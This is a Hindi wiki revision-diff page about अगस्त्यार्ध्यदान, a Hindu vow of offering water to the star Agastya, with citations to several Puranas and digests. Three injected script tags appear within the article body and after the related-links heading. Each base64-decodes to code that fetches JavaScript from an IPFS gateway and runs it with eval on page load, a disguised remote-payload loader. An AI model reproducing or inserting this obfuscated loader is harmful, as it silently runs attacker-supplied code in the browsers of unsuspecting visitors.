"अगस्त्यार्ध्यदान" के अवतरणों में अंतर
भारत डिस्कवरी प्रस्तुति
व्यवस्थापन (चर्चा | योगदान) छो (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "") |
|||
(2 सदस्यों द्वारा किये गये बीच के 2 अवतरण नहीं दर्शाए गए) | |||
पंक्ति 1: | पंक्ति 1: | ||
− | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में | + | {{menu}} |
+ | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है। | ||
*अगस्त्य नक्षत्र को अर्ध्य देना। (अध्याय 61, जहाँ मगस्त्योत्पत्ति के विषय में उल्लेख है)<ref>[[मत्स्य पुराण]], [[गरुड़ पुराण]] (1|119|1–6), जीभूतवाहन का कालविवेक (290—292)।</ref> | *अगस्त्य नक्षत्र को अर्ध्य देना। (अध्याय 61, जहाँ मगस्त्योत्पत्ति के विषय में उल्लेख है)<ref>[[मत्स्य पुराण]], [[गरुड़ पुराण]] (1|119|1–6), जीभूतवाहन का कालविवेक (290—292)।</ref> | ||
*विभिन्न देशों में विभिन्न कालों में [[अगत्स्य]] का उदय एवं अस्त होता है।<ref>[[अग्नि पुराण]] (206|1–2), राजमार्तण्ड (भोजकृत, 1206–1228), कृत्यकलपतरु का नैयतकालिक काण्ड (448–451), हेमाद्रि व्रतखण्ड (2|893–904), कृत्यरत्नाकर (294–299), वर्षक्रियाकौमुदी (340–341), राजमार्तण्ड (1219–20), मत्स्य पुराण 61|50, गरुड़ पुराण 1|119|5 समयप्रदीप (सोमदत्तकृत)।</ref> | *विभिन्न देशों में विभिन्न कालों में [[अगत्स्य]] का उदय एवं अस्त होता है।<ref>[[अग्नि पुराण]] (206|1–2), राजमार्तण्ड (भोजकृत, 1206–1228), कृत्यकलपतरु का नैयतकालिक काण्ड (448–451), हेमाद्रि व्रतखण्ड (2|893–904), कृत्यरत्नाकर (294–299), वर्षक्रियाकौमुदी (340–341), राजमार्तण्ड (1219–20), मत्स्य पुराण 61|50, गरुड़ पुराण 1|119|5 समयप्रदीप (सोमदत्तकृत)।</ref> | ||
+ | {{संदर्भ ग्रंथ}} | ||
==टीका टिप्पणी और संदर्भ== | ==टीका टिप्पणी और संदर्भ== | ||
<references/> | <references/> |
10:57, 19 जून 2011 के समय का अवतरण
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
- अगस्त्य नक्षत्र को अर्ध्य देना। (अध्याय 61, जहाँ मगस्त्योत्पत्ति के विषय में उल्लेख है)[1]
- विभिन्न देशों में विभिन्न कालों में अगत्स्य का उदय एवं अस्त होता है।[2]
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ मत्स्य पुराण, गरुड़ पुराण (1|119|1–6), जीभूतवाहन का कालविवेक (290—292)।
- ↑ अग्नि पुराण (206|1–2), राजमार्तण्ड (भोजकृत, 1206–1228), कृत्यकलपतरु का नैयतकालिक काण्ड (448–451), हेमाद्रि व्रतखण्ड (2|893–904), कृत्यरत्नाकर (294–299), वर्षक्रियाकौमुदी (340–341), राजमार्तण्ड (1219–20), मत्स्य पुराण 61|50, गरुड़ पुराण 1|119|5 समयप्रदीप (सोमदत्तकृत)।
अन्य संबंधित लिंक
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>